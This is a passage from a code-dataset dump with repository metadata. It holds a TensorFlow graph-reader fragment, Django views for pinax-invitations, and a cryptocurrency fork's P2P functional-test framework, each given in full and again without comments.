type=as_str(node.op),
name=as_str(node.name),
inputs=inputs,
outputs=outputs,
attribs=attributes)
graph.inputs = [node_outputs[node.name][0] for node in graph_def.node if node.op == 'Placeholder']
graph.outputs = [output for op in graph.operations if all(len(output.consumers) == 0 for output in op.outputs)
for output in op.outputs]
return graph
def _unpack_custom_ops(graph):
for op in graph.operations:
if op.type == 'PyFunc':
op.custom = True
op.type = op.attribs['token']
op.attribs = {key[2:-2]: value for key, value in six.iteritems(op.attribs)
if key.startswith('_$') and key.endswith('$_')}
def read_graphdef(filename, input_shapes, fold_constants):
graph_def = GraphDef()
with open(filename, 'rb') as file:
graph_def.ParseFromString(file.read())
if not _has_output_shapes(graph_def):
graph_def = _add_output_shapes(graph_def)
if input_shapes is not None:
from .utils import set_input_shapes
graph_def = set_input_shapes(graph_def, input_shapes)
if fold_constants:
from .utils import fold_constant_tensors
graph_def = fold_constant_tensors(graph_def)
graph = build_graph(graph_def)
_unpack_custom_ops(graph)
return graph
class Reader(object):
def __init__(self, fold_constants=False):
self._fold_constants = fold_constants
def __call__(self, filename, input_shapes=None):
return read_graphdef(filename, input_shapes, self._fold_constants)
| true | true |
f7326cbc92b19dd088c0d4b5e17acb19500de1d9 | 4,740 | py | Python | pinax/invitations/views.py | passiv/pinax-invitations | c3194cd1b3cc92a1d706b1f3b018d58948ed5cb2 | [
"MIT"
] | 43 | 2015-09-25T19:46:04.000Z | 2022-01-25T22:38:39.000Z | pinax/invitations/views.py | passiv/pinax-invitations | c3194cd1b3cc92a1d706b1f3b018d58948ed5cb2 | [
"MIT"
] | 21 | 2015-09-10T15:40:26.000Z | 2021-08-31T15:17:25.000Z | pinax/invitations/views.py | passiv/pinax-invitations | c3194cd1b3cc92a1d706b1f3b018d58948ed5cb2 | [
"MIT"
] | 16 | 2015-09-09T02:32:35.000Z | 2022-03-17T02:51:26.000Z | from django.contrib.auth import get_user_model
from django.contrib.auth.decorators import permission_required
from django.http import JsonResponse
from django.shortcuts import get_object_or_404
from django.template import RequestContext
from django.template.loader import render_to_string
from django.utils.decorators import method_decorator
from django.views.generic import View
from django.views.generic.edit import FormMixin
from account.mixins import LoginRequiredMixin
from .forms import InviteForm
from .models import InvitationStat, JoinInvitation
class InviteView(LoginRequiredMixin, FormMixin, View):
form_class = InviteForm
invite_form_fragment = "pinax/invitations/_invite_form.html"
invites_remaining_fragment = "pinax/invitations/_invites_remaining.html"
invited_fragment = "pinax/invitations/_invited.html"
invites_remaining_fragment_selector = ".pinax-invitations-invites-remaining"
invited_fragment_selector = ".pinax-invitations-invites-sent"
def get_data(self, form):
data = {
"html": render_to_string(
self.invite_form_fragment, {
"form": form,
"user": self.request.user
}, request=self.request
),
"fragments": {
self.invites_remaining_fragment_selector: render_to_string(
self.invites_remaining_fragment, {
"invites_remaining": self.request.user.invitationstat.invites_remaining()
}, request=self.request
),
self.invited_fragment_selector: render_to_string(
self.invited_fragment, {
"invited_list": self.request.user.invites_sent.all()
}, request=self.request
)
}
}
return data
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs.update({
"user": self.request.user
})
return kwargs
def form_valid(self, form):
email = form.cleaned_data["email_address"]
JoinInvitation.invite(self.request.user, email)
return JsonResponse(self.get_data(InviteForm(user=self.request.user)))
def form_invalid(self, form):
return JsonResponse(self.get_data(form))
def post(self, request, *args, **kwargs):
form = self.get_form()
if form.is_valid():
return self.form_valid(form)
else:
return self.form_invalid(form)
class ManageInvitesView(LoginRequiredMixin, View):
@method_decorator(permission_required("pinax-invitations.manage_invites", raise_exception=True))
def dispatch(self, *args, **kwargs):
return super().dispatch(*args, **kwargs)
class InviteStatView(ManageInvitesView):
def get(self, request, *args, **kwargs):
user = get_object_or_404(get_user_model(), pk=kwargs.get("pk"))
return JsonResponse({
"html": render_to_string(
self.invite_stat_fragment, {
"stat": user.invitationstat
}, context_instance=RequestContext(request)
)
})
class ManageInviteAmountsView(ManageInvitesView):
amount_post_var = "amount"
def get_amount(self):
return int(self.request.POST.get(self.amount_post_var))
class AllManageInviteAmountsView(ManageInviteAmountsView):
def action(self, amount):
return
def post(self, request, *args, **kwargs):
amount = self.get_amount()
self.action(amount)
return JsonResponse({
"inner-fragments": {self.inner_fragments_amount_selector: amount}
})
class UserManageInviteAmountsView(ManageInviteAmountsView):
def action(self, user, amount):
return
def post(self, request, *args, **kwargs):
user = get_object_or_404(get_user_model(), pk=kwargs.get("pk"))
amount = self.get_amount()
self.action(user, amount)
return JsonResponse({
"html": amount
})
class TopOffAllView(AllManageInviteAmountsView):
inner_fragments_amount_selector = ".invite-total"
def action(self, amount):
InvitationStat.topoff(amount)
class TopOffUserView(UserManageInviteAmountsView):
def action(self, user, amount):
InvitationStat.topoff_user(user=user, amount=amount)
class AddToAllView(AllManageInviteAmountsView):
inner_fragments_amount_selector = ".amount-added"
def action(self, amount):
InvitationStat.add_invites(amount)
class AddToUserView(UserManageInviteAmountsView):
def action(self, user, amount):
InvitationStat.add_invites_to_user(user=user, amount=amount)
| 31.184211 | 100 | 0.665401 | from django.contrib.auth import get_user_model
from django.contrib.auth.decorators import permission_required
from django.http import JsonResponse
from django.shortcuts import get_object_or_404
from django.template import RequestContext
from django.template.loader import render_to_string
from django.utils.decorators import method_decorator
from django.views.generic import View
from django.views.generic.edit import FormMixin
from account.mixins import LoginRequiredMixin
from .forms import InviteForm
from .models import InvitationStat, JoinInvitation
class InviteView(LoginRequiredMixin, FormMixin, View):
form_class = InviteForm
invite_form_fragment = "pinax/invitations/_invite_form.html"
invites_remaining_fragment = "pinax/invitations/_invites_remaining.html"
invited_fragment = "pinax/invitations/_invited.html"
invites_remaining_fragment_selector = ".pinax-invitations-invites-remaining"
invited_fragment_selector = ".pinax-invitations-invites-sent"
def get_data(self, form):
data = {
"html": render_to_string(
self.invite_form_fragment, {
"form": form,
"user": self.request.user
}, request=self.request
),
"fragments": {
self.invites_remaining_fragment_selector: render_to_string(
self.invites_remaining_fragment, {
"invites_remaining": self.request.user.invitationstat.invites_remaining()
}, request=self.request
),
self.invited_fragment_selector: render_to_string(
self.invited_fragment, {
"invited_list": self.request.user.invites_sent.all()
}, request=self.request
)
}
}
return data
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs.update({
"user": self.request.user
})
return kwargs
def form_valid(self, form):
email = form.cleaned_data["email_address"]
JoinInvitation.invite(self.request.user, email)
return JsonResponse(self.get_data(InviteForm(user=self.request.user)))
def form_invalid(self, form):
return JsonResponse(self.get_data(form))
def post(self, request, *args, **kwargs):
form = self.get_form()
if form.is_valid():
return self.form_valid(form)
else:
return self.form_invalid(form)
class ManageInvitesView(LoginRequiredMixin, View):
@method_decorator(permission_required("pinax-invitations.manage_invites", raise_exception=True))
def dispatch(self, *args, **kwargs):
return super().dispatch(*args, **kwargs)
class InviteStatView(ManageInvitesView):
def get(self, request, *args, **kwargs):
user = get_object_or_404(get_user_model(), pk=kwargs.get("pk"))
return JsonResponse({
"html": render_to_string(
self.invite_stat_fragment, {
"stat": user.invitationstat
}, context_instance=RequestContext(request)
)
})
class ManageInviteAmountsView(ManageInvitesView):
amount_post_var = "amount"
def get_amount(self):
return int(self.request.POST.get(self.amount_post_var))
class AllManageInviteAmountsView(ManageInviteAmountsView):
def action(self, amount):
return
def post(self, request, *args, **kwargs):
amount = self.get_amount()
self.action(amount)
return JsonResponse({
"inner-fragments": {self.inner_fragments_amount_selector: amount}
})
class UserManageInviteAmountsView(ManageInviteAmountsView):
def action(self, user, amount):
return
def post(self, request, *args, **kwargs):
user = get_object_or_404(get_user_model(), pk=kwargs.get("pk"))
amount = self.get_amount()
self.action(user, amount)
return JsonResponse({
"html": amount
})
class TopOffAllView(AllManageInviteAmountsView):
inner_fragments_amount_selector = ".invite-total"
def action(self, amount):
InvitationStat.topoff(amount)
class TopOffUserView(UserManageInviteAmountsView):
def action(self, user, amount):
InvitationStat.topoff_user(user=user, amount=amount)
class AddToAllView(AllManageInviteAmountsView):
inner_fragments_amount_selector = ".amount-added"
def action(self, amount):
InvitationStat.add_invites(amount)
class AddToUserView(UserManageInviteAmountsView):
def action(self, user, amount):
InvitationStat.add_invites_to_user(user=user, amount=amount)
| true | true |
f7326d7f452791ff8fb5bc06a352c3c3fbb10c38 | 23,224 | py | Python | test/functional/test_framework/mininode.py | minblock/lockely | 6bc00e80efdf563b52555bc2f547f271f399b03a | [
"MIT"
] | null | null | null | test/functional/test_framework/mininode.py | minblock/lockely | 6bc00e80efdf563b52555bc2f547f271f399b03a | [
"MIT"
] | null | null | null | test/functional/test_framework/mininode.py | minblock/lockely | 6bc00e80efdf563b52555bc2f547f271f399b03a | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2010 ArtForz -- public domain half-a-node
# Copyright (c) 2012 Jeff Garzik
# Copyright (c) 2010-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Lockelycoin P2P network half-a-node.
This python code was modified from ArtForz' public domain half-a-node, as
found in the mini-node branch of http://github.com/jgarzik/pynode.
P2PConnection: A low-level connection object to a node's P2P interface
P2PInterface: A high-level interface object for communicating to a node over P2P
P2PDataStore: A p2p interface class that keeps a store of transactions and blocks
and can respond correctly to getdata and getheaders messages"""
import asyncio
from collections import defaultdict
from io import BytesIO
import logging
import struct
import sys
import threading
from test_framework.messages import (
CBlockHeader,
MIN_VERSION_SUPPORTED,
msg_addr,
msg_block,
MSG_BLOCK,
msg_blocktxn,
msg_cmpctblock,
msg_feefilter,
msg_getaddr,
msg_getblocks,
msg_getblocktxn,
msg_getdata,
msg_getheaders,
msg_headers,
msg_inv,
msg_mempool,
msg_notfound,
msg_ping,
msg_pong,
msg_reject,
msg_sendcmpct,
msg_sendheaders,
msg_tx,
MSG_TX,
MSG_TYPE_MASK,
msg_verack,
msg_version,
NODE_NETWORK,
NODE_WITNESS,
sha256,
)
from test_framework.util import wait_until
logger = logging.getLogger("TestFramework.mininode")
MESSAGEMAP = {
b"addr": msg_addr,
b"block": msg_block,
b"blocktxn": msg_blocktxn,
b"cmpctblock": msg_cmpctblock,
b"feefilter": msg_feefilter,
b"getaddr": msg_getaddr,
b"getblocks": msg_getblocks,
b"getblocktxn": msg_getblocktxn,
b"getdata": msg_getdata,
b"getheaders": msg_getheaders,
b"headers": msg_headers,
b"inv": msg_inv,
b"mempool": msg_mempool,
b"notfound": msg_notfound,
b"ping": msg_ping,
b"pong": msg_pong,
b"reject": msg_reject,
b"sendcmpct": msg_sendcmpct,
b"sendheaders": msg_sendheaders,
b"tx": msg_tx,
b"verack": msg_verack,
b"version": msg_version,
}
MAGIC_BYTES = {
"mainnet": b"\xfb\xc0\xb6\xdb", # mainnet
"testnet4": b"\xfd\xd2\xc8\xf1", # testnet3
"regtest": b"\xfa\xbf\xb5\xda", # regtest
}
class P2PConnection(asyncio.Protocol):
"""A low-level connection object to a node's P2P interface.
This class is responsible for:
- opening and closing the TCP connection to the node
- reading bytes from and writing bytes to the socket
- deserializing and serializing the P2P message header
- logging messages as they are sent and received
This class contains no logic for handing the P2P message payloads. It must be
sub-classed and the on_message() callback overridden."""
def __init__(self):
# The underlying transport of the connection.
# Should only call methods on this from the NetworkThread, c.f. call_soon_threadsafe
self._transport = None
@property
def is_connected(self):
return self._transport is not None
def peer_connect(self, dstaddr, dstport, net="regtest"):
assert not self.is_connected
self.dstaddr = dstaddr
self.dstport = dstport
# The initial message to send after the connection was made:
self.on_connection_send_msg = None
self.recvbuf = b""
self.magic_bytes = MAGIC_BYTES[net]
logger.debug('Connecting to Lockelycoin Node: %s:%d' % (self.dstaddr, self.dstport))
loop = NetworkThread.network_event_loop
conn_gen_unsafe = loop.create_connection(lambda: self, host=self.dstaddr, port=self.dstport)
conn_gen = lambda: loop.call_soon_threadsafe(loop.create_task, conn_gen_unsafe)
return conn_gen
def peer_disconnect(self):
# Connection could have already been closed by other end.
NetworkThread.network_event_loop.call_soon_threadsafe(lambda: self._transport and self._transport.abort())
# Connection and disconnection methods
def connection_made(self, transport):
"""asyncio callback when a connection is opened."""
assert not self._transport
logger.debug("Connected & Listening: %s:%d" % (self.dstaddr, self.dstport))
self._transport = transport
if self.on_connection_send_msg:
self.send_message(self.on_connection_send_msg)
self.on_connection_send_msg = None # Never used again
self.on_open()
def connection_lost(self, exc):
"""asyncio callback when a connection is closed."""
if exc:
logger.warning("Connection lost to {}:{} due to {}".format(self.dstaddr, self.dstport, exc))
else:
logger.debug("Closed connection to: %s:%d" % (self.dstaddr, self.dstport))
self._transport = None
self.recvbuf = b""
self.on_close()
# Socket read methods
def data_received(self, t):
"""asyncio callback when data is read from the socket."""
if len(t) > 0:
self.recvbuf += t
self._on_data()
def _on_data(self):
"""Try to read P2P messages from the recv buffer.
This method reads data from the buffer in a loop. It deserializes,
parses and verifies the P2P header, then passes the P2P payload to
the on_message callback for processing."""
try:
while True:
if len(self.recvbuf) < 4:
return
if self.recvbuf[:4] != self.magic_bytes:
raise ValueError("got garbage %s" % repr(self.recvbuf))
if len(self.recvbuf) < 4 + 12 + 4 + 4:
return
command = self.recvbuf[4:4+12].split(b"\x00", 1)[0]
msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0]
checksum = self.recvbuf[4+12+4:4+12+4+4]
if len(self.recvbuf) < 4 + 12 + 4 + 4 + msglen:
return
msg = self.recvbuf[4+12+4+4:4+12+4+4+msglen]
th = sha256(msg)
h = sha256(th)
if checksum != h[:4]:
raise ValueError("got bad checksum " + repr(self.recvbuf))
self.recvbuf = self.recvbuf[4+12+4+4+msglen:]
if command not in MESSAGEMAP:
raise ValueError("Received unknown command from %s:%d: '%s' %s" % (self.dstaddr, self.dstport, command, repr(msg)))
f = BytesIO(msg)
t = MESSAGEMAP[command]()
t.deserialize(f)
self._log_message("receive", t)
self.on_message(t)
except Exception as e:
logger.exception('Error reading message:', repr(e))
raise
def on_message(self, message):
"""Callback for processing a P2P payload. Must be overridden by derived class."""
raise NotImplementedError
# Socket write methods
def send_message(self, message):
"""Send a P2P message over the socket.
This method takes a P2P payload, builds the P2P header and adds
the message to the send buffer to be sent over the socket."""
tmsg = self.build_message(message)
self._log_message("send", message)
return self.send_raw_message(tmsg)
def send_raw_message(self, raw_message_bytes):
if not self.is_connected:
raise IOError('Not connected')
def maybe_write():
if not self._transport:
return
# Python <3.4.4 does not have is_closing, so we have to check for
# its existence explicitly as long as Bitcoin Core supports all
# Python 3.4 versions.
if hasattr(self._transport, 'is_closing') and self._transport.is_closing():
return
self._transport.write(raw_message_bytes)
NetworkThread.network_event_loop.call_soon_threadsafe(maybe_write)
# Class utility methods
def build_message(self, message):
"""Build a serialized P2P message"""
command = message.command
data = message.serialize()
tmsg = self.magic_bytes
tmsg += command
tmsg += b"\x00" * (12 - len(command))
tmsg += struct.pack("<I", len(data))
th = sha256(data)
h = sha256(th)
tmsg += h[:4]
tmsg += data
return tmsg
def _log_message(self, direction, msg):
"""Logs a message being sent or received over the connection."""
if direction == "send":
log_message = "Send message to "
elif direction == "receive":
log_message = "Received message from "
log_message += "%s:%d: %s" % (self.dstaddr, self.dstport, repr(msg)[:500])
if len(log_message) > 500:
log_message += "... (msg truncated)"
logger.debug(log_message)
class P2PInterface(P2PConnection):
"""A high-level P2P interface class for communicating with a Lockelycoin node.
This class provides high-level callbacks for processing P2P message
payloads, as well as convenience methods for interacting with the
node over P2P.
Individual testcases should subclass this and override the on_* methods
if they want to alter message handling behaviour."""
def __init__(self):
super().__init__()
# Track number of messages of each type received and the most recent
# message of each type
self.message_count = defaultdict(int)
self.last_message = {}
# A count of the number of ping messages we've sent to the node
self.ping_counter = 1
# The network services received from the peer
self.nServices = 0
def peer_connect(self, *args, services=NODE_NETWORK|NODE_WITNESS, send_version=True, **kwargs):
create_conn = super().peer_connect(*args, **kwargs)
if send_version:
# Send a version msg
vt = msg_version()
vt.nServices = services
vt.addrTo.ip = self.dstaddr
vt.addrTo.port = self.dstport
vt.addrFrom.ip = "0.0.0.0"
vt.addrFrom.port = 0
self.on_connection_send_msg = vt # Will be sent soon after connection_made
return create_conn
# Message receiving methods
def on_message(self, message):
"""Receive message and dispatch message to appropriate callback.
We keep a count of how many of each message type has been received
and the most recent message of each type."""
with mininode_lock:
try:
command = message.command.decode('ascii')
self.message_count[command] += 1
self.last_message[command] = message
getattr(self, 'on_' + command)(message)
except:
print("ERROR delivering %s (%s)" % (repr(message), sys.exc_info()[0]))
raise
# Callback methods. Can be overridden by subclasses in individual test
# cases to provide custom message handling behaviour.
def on_open(self):
pass
def on_close(self):
pass
def on_addr(self, message): pass
def on_block(self, message): pass
def on_blocktxn(self, message): pass
def on_cmpctblock(self, message): pass
def on_feefilter(self, message): pass
def on_getaddr(self, message): pass
def on_getblocks(self, message): pass
def on_getblocktxn(self, message): pass
def on_getdata(self, message): pass
def on_getheaders(self, message): pass
def on_headers(self, message): pass
def on_mempool(self, message): pass
def on_notfound(self, message): pass
def on_pong(self, message): pass
def on_reject(self, message): pass
def on_sendcmpct(self, message): pass
def on_sendheaders(self, message): pass
def on_tx(self, message): pass
def on_inv(self, message):
want = msg_getdata()
for i in message.inv:
if i.type != 0:
want.inv.append(i)
if len(want.inv):
self.send_message(want)
def on_ping(self, message):
self.send_message(msg_pong(message.nonce))
def on_verack(self, message):
pass
def on_version(self, message):
assert message.nVersion >= MIN_VERSION_SUPPORTED, "Version {} received. Test framework only supports versions greater than {}".format(message.nVersion, MIN_VERSION_SUPPORTED)
self.send_message(msg_verack())
self.nServices = message.nServices
# Connection helper methods
def wait_for_disconnect(self, timeout=60):
test_function = lambda: not self.is_connected
wait_until(test_function, timeout=timeout, lock=mininode_lock)
# Message receiving helper methods
def wait_for_tx(self, txid, timeout=60):
def test_function():
if not self.last_message.get('tx'):
return False
return self.last_message['tx'].tx.rehash() == txid
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_block(self, blockhash, timeout=60):
test_function = lambda: self.last_message.get("block") and self.last_message["block"].block.rehash() == blockhash
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_header(self, blockhash, timeout=60):
def test_function():
last_headers = self.last_message.get('headers')
if not last_headers:
return False
return last_headers.headers[0].rehash() == blockhash
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_getdata(self, timeout=60):
"""Waits for a getdata message.
Receiving any getdata message will satisfy the predicate. the last_message["getdata"]
value must be explicitly cleared before calling this method, or this will return
immediately with success. TODO: change this method to take a hash value and only
return true if the correct block/tx has been requested."""
test_function = lambda: self.last_message.get("getdata")
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_getheaders(self, timeout=60):
"""Waits for a getheaders message.
Receiving any getheaders message will satisfy the predicate. the last_message["getheaders"]
value must be explicitly cleared before calling this method, or this will return
immediately with success. TODO: change this method to take a hash value and only
return true if the correct block header has been requested."""
test_function = lambda: self.last_message.get("getheaders")
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_inv(self, expected_inv, timeout=60):
"""Waits for an INV message and checks that the first inv object in the message was as expected."""
if len(expected_inv) > 1:
raise NotImplementedError("wait_for_inv() will only verify the first inv object")
test_function = lambda: self.last_message.get("inv") and \
self.last_message["inv"].inv[0].type == expected_inv[0].type and \
self.last_message["inv"].inv[0].hash == expected_inv[0].hash
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_verack(self, timeout=60):
test_function = lambda: self.message_count["verack"]
wait_until(test_function, timeout=timeout, lock=mininode_lock)
# Message sending helper functions
def send_and_ping(self, message, timeout=60):
self.send_message(message)
self.sync_with_ping(timeout=timeout)
# Sync up with the node
def sync_with_ping(self, timeout=60):
self.send_message(msg_ping(nonce=self.ping_counter))
test_function = lambda: self.last_message.get("pong") and self.last_message["pong"].nonce == self.ping_counter
wait_until(test_function, timeout=timeout, lock=mininode_lock)
self.ping_counter += 1
# One lock for synchronizing all data access between the network event loop (see
# NetworkThread below) and the thread running the test logic. For simplicity,
# P2PConnection acquires this lock whenever delivering a message to a P2PInterface.
# This lock should be acquired in the thread running the test logic to synchronize
# access to any data shared with the P2PInterface or P2PConnection.
mininode_lock = threading.RLock()
class NetworkThread(threading.Thread):
network_event_loop = None
def __init__(self):
super().__init__(name="NetworkThread")
# There is only one event loop and no more than one thread must be created
assert not self.network_event_loop
NetworkThread.network_event_loop = asyncio.new_event_loop()
def run(self):
"""Start the network thread."""
self.network_event_loop.run_forever()
def close(self, timeout=10):
"""Close the connections and network event loop."""
self.network_event_loop.call_soon_threadsafe(self.network_event_loop.stop)
wait_until(lambda: not self.network_event_loop.is_running(), timeout=timeout)
self.network_event_loop.close()
self.join(timeout)
class P2PDataStore(P2PInterface):
"""A P2P data store class.
Keeps a block and transaction store and responds correctly to getdata and getheaders requests."""
def __init__(self):
super().__init__()
# store of blocks. key is block hash, value is a CBlock object
self.block_store = {}
self.last_block_hash = ''
# store of txs. key is txid, value is a CTransaction object
self.tx_store = {}
self.getdata_requests = []
def on_getdata(self, message):
"""Check for the tx/block in our stores and if found, reply with an inv message."""
for inv in message.inv:
self.getdata_requests.append(inv.hash)
if (inv.type & MSG_TYPE_MASK) == MSG_TX and inv.hash in self.tx_store.keys():
self.send_message(msg_tx(self.tx_store[inv.hash]))
elif (inv.type & MSG_TYPE_MASK) == MSG_BLOCK and inv.hash in self.block_store.keys():
self.send_message(msg_block(self.block_store[inv.hash]))
else:
logger.debug('getdata message type {} received.'.format(hex(inv.type)))
def on_getheaders(self, message):
"""Search back through our block store for the locator, and reply with a headers message if found."""
locator, hash_stop = message.locator, message.hashstop
# Assume that the most recent block added is the tip
if not self.block_store:
return
headers_list = [self.block_store[self.last_block_hash]]
maxheaders = 2000
while headers_list[-1].sha256 not in locator.vHave:
# Walk back through the block store, adding headers to headers_list
# as we go.
prev_block_hash = headers_list[-1].hashPrevBlock
if prev_block_hash in self.block_store:
prev_block_header = CBlockHeader(self.block_store[prev_block_hash])
headers_list.append(prev_block_header)
if prev_block_header.sha256 == hash_stop:
# if this is the hashstop header, stop here
break
else:
logger.debug('block hash {} not found in block store'.format(hex(prev_block_hash)))
break
# Truncate the list if there are too many headers
headers_list = headers_list[:-maxheaders - 1:-1]
response = msg_headers(headers_list)
if response is not None:
self.send_message(response)
def send_blocks_and_test(self, blocks, node, *, success=True, force_send=False, reject_reason=None, expect_disconnect=False, timeout=60):
"""Send blocks to test node and test whether the tip advances.
- add all blocks to our block_store
- send a headers message for the final block
- the on_getheaders handler will ensure that any getheaders are responded to
- if force_send is False: wait for getdata for each of the blocks. The on_getdata handler will
ensure that any getdata messages are responded to. Otherwise send the full block unsolicited.
- if success is True: assert that the node's tip advances to the most recent block
- if success is False: assert that the node's tip doesn't advance
- if reject_reason is set: assert that the correct reject message is logged"""
with mininode_lock:
for block in blocks:
self.block_store[block.sha256] = block
self.last_block_hash = block.sha256
reject_reason = [reject_reason] if reject_reason else []
with node.assert_debug_log(expected_msgs=reject_reason):
if force_send:
for b in blocks:
self.send_message(msg_block(block=b))
else:
self.send_message(msg_headers([CBlockHeader(blocks[-1])]))
wait_until(lambda: blocks[-1].sha256 in self.getdata_requests, timeout=timeout, lock=mininode_lock)
if expect_disconnect:
self.wait_for_disconnect(timeout=timeout)
else:
self.sync_with_ping(timeout=timeout)
if success:
wait_until(lambda: node.getbestblockhash() == blocks[-1].hash, timeout=timeout)
else:
assert node.getbestblockhash() != blocks[-1].hash
def send_txs_and_test(self, txs, node, *, success=True, expect_disconnect=False, reject_reason=None):
"""Send txs to test node and test whether they're accepted to the mempool.
- add all txs to our tx_store
- send tx messages for all txs
- if success is True/False: assert that the txs are/are not accepted to the mempool
- if expect_disconnect is True: Skip the sync with ping
- if reject_reason is set: assert that the correct reject message is logged."""
with mininode_lock:
for tx in txs:
self.tx_store[tx.sha256] = tx
reject_reason = [reject_reason] if reject_reason else []
with node.assert_debug_log(expected_msgs=reject_reason):
for tx in txs:
self.send_message(msg_tx(tx))
if expect_disconnect:
self.wait_for_disconnect()
else:
self.sync_with_ping()
raw_mempool = node.getrawmempool()
if success:
# Check that all txs are now in the mempool
for tx in txs:
assert tx.hash in raw_mempool, "{} not found in mempool".format(tx.hash)
else:
# Check that none of the txs are now in the mempool
for tx in txs:
assert tx.hash not in raw_mempool, "{} tx found in mempool".format(tx.hash)
| 39.362712 | 182 | 0.645065 |
import asyncio
from collections import defaultdict
from io import BytesIO
import logging
import struct
import sys
import threading
from test_framework.messages import (
CBlockHeader,
MIN_VERSION_SUPPORTED,
msg_addr,
msg_block,
MSG_BLOCK,
msg_blocktxn,
msg_cmpctblock,
msg_feefilter,
msg_getaddr,
msg_getblocks,
msg_getblocktxn,
msg_getdata,
msg_getheaders,
msg_headers,
msg_inv,
msg_mempool,
msg_notfound,
msg_ping,
msg_pong,
msg_reject,
msg_sendcmpct,
msg_sendheaders,
msg_tx,
MSG_TX,
MSG_TYPE_MASK,
msg_verack,
msg_version,
NODE_NETWORK,
NODE_WITNESS,
sha256,
)
from test_framework.util import wait_until
logger = logging.getLogger("TestFramework.mininode")
MESSAGEMAP = {
b"addr": msg_addr,
b"block": msg_block,
b"blocktxn": msg_blocktxn,
b"cmpctblock": msg_cmpctblock,
b"feefilter": msg_feefilter,
b"getaddr": msg_getaddr,
b"getblocks": msg_getblocks,
b"getblocktxn": msg_getblocktxn,
b"getdata": msg_getdata,
b"getheaders": msg_getheaders,
b"headers": msg_headers,
b"inv": msg_inv,
b"mempool": msg_mempool,
b"notfound": msg_notfound,
b"ping": msg_ping,
b"pong": msg_pong,
b"reject": msg_reject,
b"sendcmpct": msg_sendcmpct,
b"sendheaders": msg_sendheaders,
b"tx": msg_tx,
b"verack": msg_verack,
b"version": msg_version,
}
MAGIC_BYTES = {
"mainnet": b"\xfb\xc0\xb6\xdb",
"testnet4": b"\xfd\xd2\xc8\xf1",
"regtest": b"\xfa\xbf\xb5\xda",
}
class P2PConnection(asyncio.Protocol):
def __init__(self):
self._transport = None
@property
def is_connected(self):
return self._transport is not None
def peer_connect(self, dstaddr, dstport, net="regtest"):
assert not self.is_connected
self.dstaddr = dstaddr
self.dstport = dstport
self.on_connection_send_msg = None
self.recvbuf = b""
self.magic_bytes = MAGIC_BYTES[net]
logger.debug('Connecting to Lockelycoin Node: %s:%d' % (self.dstaddr, self.dstport))
loop = NetworkThread.network_event_loop
conn_gen_unsafe = loop.create_connection(lambda: self, host=self.dstaddr, port=self.dstport)
conn_gen = lambda: loop.call_soon_threadsafe(loop.create_task, conn_gen_unsafe)
return conn_gen
def peer_disconnect(self):
NetworkThread.network_event_loop.call_soon_threadsafe(lambda: self._transport and self._transport.abort())
def connection_made(self, transport):
assert not self._transport
logger.debug("Connected & Listening: %s:%d" % (self.dstaddr, self.dstport))
self._transport = transport
if self.on_connection_send_msg:
self.send_message(self.on_connection_send_msg)
self.on_connection_send_msg = None
self.on_open()
def connection_lost(self, exc):
if exc:
logger.warning("Connection lost to {}:{} due to {}".format(self.dstaddr, self.dstport, exc))
else:
logger.debug("Closed connection to: %s:%d" % (self.dstaddr, self.dstport))
self._transport = None
self.recvbuf = b""
self.on_close()
def data_received(self, t):
if len(t) > 0:
self.recvbuf += t
self._on_data()
def _on_data(self):
try:
while True:
if len(self.recvbuf) < 4:
return
if self.recvbuf[:4] != self.magic_bytes:
raise ValueError("got garbage %s" % repr(self.recvbuf))
if len(self.recvbuf) < 4 + 12 + 4 + 4:
return
command = self.recvbuf[4:4+12].split(b"\x00", 1)[0]
msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0]
checksum = self.recvbuf[4+12+4:4+12+4+4]
if len(self.recvbuf) < 4 + 12 + 4 + 4 + msglen:
return
msg = self.recvbuf[4+12+4+4:4+12+4+4+msglen]
th = sha256(msg)
h = sha256(th)
if checksum != h[:4]:
raise ValueError("got bad checksum " + repr(self.recvbuf))
self.recvbuf = self.recvbuf[4+12+4+4+msglen:]
if command not in MESSAGEMAP:
raise ValueError("Received unknown command from %s:%d: '%s' %s" % (self.dstaddr, self.dstport, command, repr(msg)))
f = BytesIO(msg)
t = MESSAGEMAP[command]()
t.deserialize(f)
self._log_message("receive", t)
self.on_message(t)
except Exception as e:
logger.exception('Error reading message:', repr(e))
raise
def on_message(self, message):
raise NotImplementedError
def send_message(self, message):
tmsg = self.build_message(message)
self._log_message("send", message)
return self.send_raw_message(tmsg)
def send_raw_message(self, raw_message_bytes):
if not self.is_connected:
raise IOError('Not connected')
def maybe_write():
if not self._transport:
return
if hasattr(self._transport, 'is_closing') and self._transport.is_closing():
return
self._transport.write(raw_message_bytes)
NetworkThread.network_event_loop.call_soon_threadsafe(maybe_write)
def build_message(self, message):
command = message.command
data = message.serialize()
tmsg = self.magic_bytes
tmsg += command
tmsg += b"\x00" * (12 - len(command))
tmsg += struct.pack("<I", len(data))
th = sha256(data)
h = sha256(th)
tmsg += h[:4]
tmsg += data
return tmsg
def _log_message(self, direction, msg):
if direction == "send":
log_message = "Send message to "
elif direction == "receive":
log_message = "Received message from "
log_message += "%s:%d: %s" % (self.dstaddr, self.dstport, repr(msg)[:500])
if len(log_message) > 500:
log_message += "... (msg truncated)"
logger.debug(log_message)
class P2PInterface(P2PConnection):
def __init__(self):
super().__init__()
self.message_count = defaultdict(int)
self.last_message = {}
self.ping_counter = 1
# The network services received from the peer
self.nServices = 0
def peer_connect(self, *args, services=NODE_NETWORK|NODE_WITNESS, send_version=True, **kwargs):
create_conn = super().peer_connect(*args, **kwargs)
if send_version:
# Send a version msg
vt = msg_version()
vt.nServices = services
vt.addrTo.ip = self.dstaddr
vt.addrTo.port = self.dstport
vt.addrFrom.ip = "0.0.0.0"
vt.addrFrom.port = 0
self.on_connection_send_msg = vt # Will be sent soon after connection_made
